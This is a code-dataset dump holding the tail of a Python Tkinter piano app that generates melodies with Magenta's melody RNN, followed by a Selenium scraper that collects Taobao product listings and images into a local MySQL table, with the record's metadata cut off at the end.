(\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 13, padx = 5, pady = 5)\n\nspace = Tk.Label(tmp_frame2,height = 6, width = 4,text = \"\",font = (\"arial\",18,\"bold\"), bg = \"white\",fg = \"white\")\nspace.grid(row = 0, column = 14, padx = 5, pady = 5)\n\n# =================================== white key\nbtnC = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"C\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnC.grid(row = 1, column = 0, padx = 5, pady = 5)\nbtnC.bind(\"\",lambda event:value_C())\nroot.bind(\"\", lambda event: value_C())\n\n\nbtnD = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"D\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnD.grid(row = 1, column = 1, padx = 5, pady = 5)\nbtnD.bind(\"\",lambda event:value_D())\nroot.bind(\"\", lambda event: value_D())\n\n\nbtnE = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"E\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnE.grid(row = 1, column = 2, padx = 5, pady = 5)\nbtnE.bind(\"\",lambda event:value_E())\nroot.bind(\"\", lambda event: value_E())\n\n\nbtnF = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"F\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnF.grid(row = 1, column = 3, padx = 5, pady = 5)\nbtnF.bind(\"\",lambda event:value_F())\nroot.bind(\"\", lambda event: value_F())\n\n\nbtnG = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"G\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnG.grid(row = 1, column = 4, padx = 5, pady = 5)\nbtnG.bind(\"\",lambda event:value_G())\nroot.bind(\"\", lambda event: value_G())\n\n\nbtnA = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"A\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnA.grid(row = 1, column = 5, padx = 5, pady = 5)\nbtnA.bind(\"\",lambda event:value_A())\nroot.bind(\"\", lambda event: value_A())\n\n\nbtnB = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"B\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnB.grid(row = 1, column = 6, padx = 5, pady = 5)\nbtnB.bind(\"\",lambda event:value_B())\nroot.bind(\"\", lambda event: value_B())\n\n\nbtnC1 = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 
4,text = \"C1\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnC1.grid(row = 1, column = 7, padx = 5, pady = 5)\nbtnC1.bind(\"\",lambda event:value_C1())\nroot.bind(\"\", lambda event: value_C1())\n\n\nbtnD1 = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"D1\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnD1.grid(row = 1, column = 8, padx = 5, pady = 5)\nbtnD1.bind(\"\",lambda event:value_D1())\nroot.bind(\"\", lambda event: value_D1())\n\n\nbtnE1 = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"E1\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnE1.grid(row = 1, column = 9, padx = 5, pady = 5)\nbtnE1.bind(\"\",lambda event:value_E1())\nroot.bind(\"<;>\", lambda event: value_E1())\n\n\nbtnF1 = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"F1\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnF1.grid(row = 1, column = 10, padx = 5, pady = 5)\nbtnF1.bind(\"\",lambda event:value_F1())\nroot.bind(\"<'>\", lambda event: value_F1())\n\n\ndef call_melody_rnn(primer_melody):\n print(\"primer_melody: \")\n print(primer_melody)\n print(type(primer_melody))\n flist = tf.app.flags.FLAGS._flags()\n klist = []\n\n for i in flist:\n klist.append(i)\n\n for k in klist:\n tf.app.flags.FLAGS.__delattr__(k)\n\n FLAGS = tf.app.flags.FLAGS\n\n tf.app.flags.DEFINE_string(\n 'run_dir', None,\n 'Path to the directory where the latest checkpoint will be loaded from.')\n tf.app.flags.DEFINE_string(\n 'checkpoint_file', None,\n 'Path to the checkpoint file. run_dir will take priority over this flag.')\n tf.app.flags.DEFINE_string(\n 'bundle_file', \"/Users/yuhaomao/Downloads/lookback_rnn.mag\",\n 'Path to the bundle file. If specified, this will take priority over '\n 'run_dir and checkpoint_file, unless save_generator_bundle is True, in '\n 'which case both this flag and either run_dir or checkpoint_file are '\n 'required')\n tf.app.flags.DEFINE_boolean(\n 'save_generator_bundle', False,\n 'If true, instead of generating a sequence, will save this generator as a '\n 'bundle file in the location specified by the bundle_file flag')\n tf.app.flags.DEFINE_string(\n 'bundle_description', None,\n 'A short, human-readable text description of the bundle (e.g., training '\n 'data, hyper parameters, etc.).')\n tf.app.flags.DEFINE_string(\n 'output_dir', '/tmp/melody_rnn/generated',\n 'The directory where MIDI files will be saved to.')\n tf.app.flags.DEFINE_integer(\n 'num_outputs', 10,\n 'The number of melodies to generate. One MIDI file will be created for '\n 'each.')\n tf.app.flags.DEFINE_integer(\n 'num_steps', 128,\n 'The total number of steps the generated melodies should be, priming '\n 'melody length + generated steps. Each step is a 16th of a bar.')\n tf.app.flags.DEFINE_string(\n 'primer_melody', primer_melody,\n 'A string representation of a Python list of '\n 'magenta.music.Melody event values. For example: '\n '\"[60, -2, 60, -2, 67, -2, 67, -2]\". If specified, this melody will be '\n 'used as the priming melody. If a priming melody is not specified, '\n 'melodies will be generated from scratch.')\n tf.app.flags.DEFINE_string(\n 'primer_midi', '',\n 'The path to a MIDI file containing a melody that will be used as a '\n 'priming melody. If a primer melody is not specified, melodies will be '\n 'generated from scratch.')\n tf.app.flags.DEFINE_float(\n 'qpm', None,\n 'The quarters per minute to play generated output at. 
If a primer MIDI is '\n 'given, the qpm from that will override this flag. If qpm is None, qpm '\n 'will default to 120.')\n tf.app.flags.DEFINE_float(\n 'temperature', 1.0,\n 'The randomness of the generated melodies. 1.0 uses the unaltered softmax '\n 'probabilities, greater than 1.0 makes melodies more random, less than 1.0 '\n 'makes melodies less random.')\n tf.app.flags.DEFINE_integer(\n 'beam_size', 1,\n 'The beam size to use for beam search when generating melodies.')\n tf.app.flags.DEFINE_integer(\n 'branch_factor', 1,\n 'The branch factor to use for beam search when generating melodies.')\n tf.app.flags.DEFINE_integer(\n 'steps_per_iteration', 1,\n 'The number of melody steps to take per beam search iteration.')\n tf.app.flags.DEFINE_string(\n 'log', 'INFO',\n 'The threshold for what messages will be logged DEBUG, INFO, WARN, ERROR, '\n 'or FATAL.')\n\n tf.app.flags.DEFINE_string(\n 'hparams', \"\", 'Hyperparameter overrides, '\n 'represented as a string containing comma-separated '\n 'hparam_name=value pairs.')\n\n melody_rnn_generate.main(\"/Users/yuhaomao/Desktop/magenta/magenta/models/melody_rnn/melody_rnn_generate.py\")\n\n\n# ==========detect keyboard input\ndef root_exit():\n # global pids_begin\n # pids_begin = psutil.pids()\n # print(\"111\")\n # print(pids_begin)\n # os.system(\"python3 /Users/yuhaomao/Desktop/magenta/magenta/models/melody_rnn/melody_rnn_generate.py --config=lookback_rnn --bundle_file=/Users/yuhaomao/Downloads/lookback_rnn.mag --output_dir=/tmp/melody_rnn/generated --num_outputs=3 --num_steps=128 --primer_melody=\\\"%s\\\"\" % str(pitch_list))\n call_melody_rnn()\n # os.system(\"python3 /Users/yuhaomao/PycharmProjects/piano-python/play_midi.py /private/tmp/melody_rnn/generated/2019-05-07_143707_30.mid\")\n pygame.mixer.music.load(\"/Users/yuhaomao/Downloads/twinkle_twinkle.mid\")\n pygame.mixer.music.play()\n# timer=threading.Timer(3,root_exit)\n\ndef generate_play():\n global pitch_list\n pitch_list += m_r_g_pitch_list\n call_melody_rnn(str(pitch_list[-5:]))\n pygame.mixer.music.load(\"/private/tmp/melody_rnn/generated/%s\" % melody_rnn_generate.midi_file)\n pygame.mixer.music.play()\n root.after(13000,generate_play)\n\n\ndef detectInput():\n global start_stop\n global pitch_list\n # start_stop = True\n # global timer\n # timer.cancel()\n # timer = threading.Timer(3,root_exit)\n # timer.start()\n # os.system(\"python3 /Users/yuhaomao/Desktop/magenta/magenta/models/melody_rnn/melody_rnn_generate.py --config=lookback_rnn --bundle_file=/Users/yuhaomao/Downloads/lookback_rnn.mag --output_dir=/tmp/melody_rnn/generated --num_outputs=3 --num_steps=128 --primer_melody=\\\"%s\\\"\" % str(pitch_list))\n # print(\"123131\")\n # print(pitch_list)\n # print(type((pitch_list)))\n # print(type(\"[60,-2,60,-2,67,-2,67,-2]\"))\n pitch_list += m_r_g_pitch_list\n call_melody_rnn(str(pitch_list[-5:]))\n pygame.mixer.music.load(\"/private/tmp/melody_rnn/generated/%s\" % melody_rnn_generate.midi_file)\n pygame.mixer.music.play()\n root.after(13000,generate_play)\n # while start_stop:\n # # print(\"gui gui gui gui\")\n # # print(m_r_g_pitch_list)\n # # print(\"########################################\")\n # # t = time.time()\n # # print(\"detect input__\")\n # # print(int(round(t * 1000)))\n # # print(\"aaasdadadadsadsd\")\n # # print(melody_rnn_generate.midi_file)\n # # print('/private/tmp/melody_rnn/generated/%s' % melody_rnn_generate.midi_file)\n # pygame.mixer.music.load(\"/private/tmp/melody_rnn/generated/%s\" % melody_rnn_generate.midi_file)\n # 
pygame.mixer.music.play()\n # call_melody_rnn(str(pitch_list[-5:]))\n # root.update()\n # sleep(13)\n\ndef stop_music():\n # global start_stop\n # start_stop = False\n pygame.mixer.music.stop()\n # pids_stop = psutil.pids()\n # print(\"222\")\n # print(pids_stop)\n # kill(pids_stop[-1])\n # for pid in pids_stop:\n # # if pid not in pids_begin:\n # p = psutil.Process(pid)\n # print(\"pid-%d,pname-%s\" % (pid, p.name()))\n # # kill(pid)\n # pass\n\n\nroot.bind(\"\", lambda event:detectInput())\nroot.bind(\"\", lambda event:stop_music())\n\n# root.bind(\"\", lambda event:detectInput())\n# root.bind(\"\", lambda event:stop_music())\n#========= main loop\n\nroot.mainloop()", "repo_name": "myh1234567/piano-python", "sub_path": "gui_panio.py", "file_name": "gui_panio.py", "file_ext": "py", "file_size_in_byte": 20068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.mixer.init", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 19, "usage_type": "attribute"}, {"api_name": "threading.Lock", "line_number": 22, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 25, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 48, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.mixer.Sound", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 105, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 114, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 114, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 123, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 123, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 132, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 132, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 141, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 159, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 159, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 168, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 177, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 177, "usage_type": "attribute"}, {"api_name": 
"pygame.mixer.Sound", "line_number": 186, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 195, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 195, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 204, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 204, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 213, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 213, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 234, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 237, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 243, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 248, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 251, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 254, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 260, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 266, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 271, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 274, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 277, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 283, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 288, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 291, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 294, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 298, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 304, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 310, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 316, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 322, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 328, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 334, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 340, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 346, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 352, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 358, "usage_type": "call"}, {"api_name": "tensorflow.app.flags.FLAGS._flags", "line_number": 368, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 368, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.FLAGS.__delattr__", "line_number": 375, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 375, "usage_type": "attribute"}, {"api_name": "tensorflow.app", "line_number": 377, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 379, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 379, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 382, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 382, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 385, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 385, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_boolean", "line_number": 391, "usage_type": "call"}, 
{"api_name": "tensorflow.app", "line_number": 391, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 395, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 395, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 399, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 399, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 402, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 402, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 406, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 406, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 410, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 410, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 417, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 417, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_float", "line_number": 422, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 422, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_float", "line_number": 427, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 427, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 432, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 432, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 435, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 435, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 438, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 438, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 441, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 441, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 446, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 446, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate.main", "line_number": 451, "usage_type": "call"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate", "line_number": 451, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 463, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 463, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 464, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 464, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate.m_r_g_pitch_list", "line_number": 469, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 471, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 471, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate.midi_file", "line_number": 471, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate", "line_number": 471, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 472, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 472, "usage_type": "attribute"}, {"api_name": 
"magenta.models.melody_rnn.melody_rnn_generate.m_r_g_pitch_list", "line_number": 489, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 491, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 491, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate.midi_file", "line_number": 491, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate", "line_number": 491, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 492, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 492, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.stop", "line_number": 513, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 513, "usage_type": "attribute"}]} +{"seq_id": "26642861489", "text": "\"\"\"大概用时 210s\"\"\"\r\nfrom selenium import webdriver\r\nfrom pyquery import PyQuery as pq\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom time import time\r\nimport pymysql\r\nimport requests\r\nimport re\r\nimport random\r\nimport os\r\n\r\nKEY = '智能机器人'\r\ncid = 16\r\nfolder1 = 'smart device/'\r\nfolder2 = 'smart robot/'\r\ndb = pymysql.connect(\"localhost\", \"root\", \"\", port=3306, db='myweb', charset='utf8')\r\ncursor = db.cursor()\r\ntable = 'itcast_goods'\r\n\r\nchrome_options = Options()\r\nchrome_options.add_argument('--headless')\r\nbrowser = webdriver.Chrome(chrome_options=chrome_options)\r\nbrowser.get('https://www.taobao.com')\r\nwait = WebDriverWait(browser, 10)\r\n\r\n\r\n# browser = webdriver.Chrome()\r\n# browser.get('https://www.taobao.com')\r\n# wait = WebDriverWait(browser, 10)\r\n\r\n\r\ndef enterANDfindpages(key):\r\n try:\r\n pages = 0\r\n global brower\r\n global wait\r\n input = wait.until(EC.presence_of_element_located((By.ID, 'q')))\r\n input.send_keys(key)\r\n button = wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'btn-search')))\r\n button.click()\r\n doc = pq(browser.page_source)\r\n pages0 = doc('.total').text()\r\n try:\r\n pages = re.search(r'\\d+', pages0).group(0)\r\n except AttributeError:\r\n print('关键词未找到')\r\n return int(pages)\r\n except TimeoutException:\r\n enterANDfindpages(key)\r\n\r\n\r\ndef pagedetail(page):\r\n try:\r\n input = wait.until(\r\n EC.presence_of_element_located((By.CSS_SELECTOR, '#mainsrp-pager > div > div > div > div.form > input')))\r\n input.clear()\r\n input.send_keys(page)\r\n button = wait.until(EC.presence_of_element_located(\r\n (By.CSS_SELECTOR, '#mainsrp-pager > div > div > div > div.form > span.btn.J_Submit')))\r\n button.click()\r\n pp = browser.find_element_by_css_selector('#mainsrp-pager li.item.active > span').text\r\n wait.until(\r\n EC.text_to_be_present_in_element((By.CSS_SELECTOR, '#mainsrp-pager li.item.active > span'), str(page)))\r\n wait.until(\r\n EC.presence_of_element_located((By.CSS_SELECTOR, '#mainsrp-itemlist .items .item.J_MouserOnverReq')))\r\n return browser.page_source\r\n except Exception as ex:\r\n # print('ccl', ex.reason())\r\n pagedetail(page)\r\n\r\n\r\ndef download_image(item):\r\n if not os.path.exists(item.get('gid')):\r\n os.mkdir(item.get('gid'))\r\n i = 0\r\n try:\r\n for url in item.get('imgurl'):\r\n response = requests.get(url)\r\n if response.status_code == 200:\r\n i = i + 1\r\n 
file_path = '{0}/{1}.{2}'.format(item.get('gid'), i, 'jpg')\r\n if not os.path.exists(file_path):\r\n with open(file_path, 'wb')as f:\r\n f.write(response.content)\r\n else:\r\n print('Already downloaded!!!')\r\n except requests.ConnectionError:\r\n print(\"Downloading failed!!!\")\r\n\r\n\r\ndef findimageAndscription(url):\r\n # print(url) #如果出错可以不注释这里,查看出错的具体网页\r\n html = requests.get(url)\r\n doc = pq(html.text)\r\n urls = []\r\n if not doc('#J_UlThumb').html():\r\n if len(browser.window_handles) == 1:\r\n browser.execute_script('window.open()')\r\n browser.switch_to_window(browser.window_handles[1])\r\n browser.get(url)\r\n doc = pq(browser.page_source)\r\n browser.switch_to_window(browser.window_handles[0])\r\n html = doc('#J_UlThumb > li').items()\r\n for i in html:\r\n if re.search('60q90', str(i('a img').attr('src'))):\r\n img_url = i('a img').attr('src').strip('//')\r\n img_url = 'http://' + re.sub('_\\d+x\\d.+jpg.*?$', '', img_url).strip('//')\r\n elif re.search('_\\d+x\\d', str(i('a img').attr('data-src'))):\r\n img_url = 'https:' + i('a img').attr('data-src')\r\n img_url = re.sub('_\\d+x\\d.+jpg.*?$', '', img_url)\r\n else:\r\n img_url = ''\r\n urls.append(img_url)\r\n description = doc('#J_AttrUL').text()\r\n if not description:\r\n description = doc('#attributes > ul').text()\r\n description = re.sub('\\n', '++', description)\r\n if urls:\r\n # print(urls)\r\n data = []\r\n data.append(urls)\r\n data.append(description)\r\n return data\r\n else:\r\n return None\r\n\r\n\r\ndef get_products(html):\r\n doc = pq(html)\r\n doc('span').remove()\r\n items = doc('#mainsrp-itemlist .items .item.J_MouserOnverReq').items()\r\n for item in items:\r\n price = item('.price').text().replace('\\n', '').replace('¥', '')\r\n title = item.find('.ctx-box .row-2').text()\r\n title = re.sub('\\\\n|\\s', \"\", title)\r\n url = 'https://' + item.find('.ctx-box .row-2 .J_ClickStat').attr('href').lstrip('https://').lstrip('//')\r\n if re.search('tmall', url) or (not re.search('simba', url)):\r\n gid = re.search('id=(\\d+)', url).group(1)\r\n d = findimageAndscription(url)\r\n if d:\r\n data = {\r\n 'gid': gid,\r\n 'gname': title,\r\n 'price': price,\r\n 'thumb': folder1 + folder2 + gid,\r\n 'status': random.choice(['yes', 'no']),\r\n 'description': \"\".join(d.pop(1).split()),\r\n 'stock': random.randint(1, 100),\r\n 'cid': cid,\r\n 'sales': random.randint(1, 100),\r\n 'imgurl': d.pop(0)\r\n }\r\n # print(data)\r\n yield (data)\r\n else:\r\n yield None\r\n\r\n\r\ndef savetoMysql(data):\r\n keys = ','.join(data.keys())\r\n values = ','.join(['%s'] * len(data))\r\n sql2 = 'INSERT INTO {table}({keys}) values ({values})'.format(table=table, keys=keys, values=values)\r\n try:\r\n if cursor.execute(sql2, tuple(data.values())):\r\n print('success')\r\n db.commit()\r\n except Exception as e:\r\n print('erro', repr(e))\r\n db.rollback()\r\n\r\n\r\ndef save(data):\r\n download_image(data)\r\n data.pop('imgurl')\r\n # print(data)\r\n savetoMysql(data)\r\n # print(data)\r\n\r\n\r\ndef main():\r\n pages = enterANDfindpages(KEY)\r\n for page in range(1, 2):\r\n print(page)\r\n for d in get_products(pagedetail(page)):\r\n save(d)\r\n\r\n\r\nif __name__ == '__main__':\r\n if not os.path.exists(folder2):\r\n os.mkdir(folder2)\r\n os.chdir(folder2)\r\n ago = time()\r\n main()\r\n browser.close()\r\n print(\"用时\", time() - ago)\r\n", "repo_name": "LiuYuann/taobaogoods", "sub_path": "spider.py", "file_name": "spider.py", "file_ext": "py", "file_size_in_byte": 6846, "program_lang": "python", "lang": "en", "doc_type": 
"code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pymysql.connect", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.wait.WebDriverWait", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 41, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 41, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 43, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 43, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 43, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 43, "usage_type": "name"}, {"api_name": "pyquery.PyQuery", "line_number": 45, "usage_type": "call"}, {"api_name": "re.search", "line_number": 48, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 52, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 59, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 59, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 59, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 59, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 62, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 62, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 63, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 63, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.text_to_be_present_in_element", "line_number": 67, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 67, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 67, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 67, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 69, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 69, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 69, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 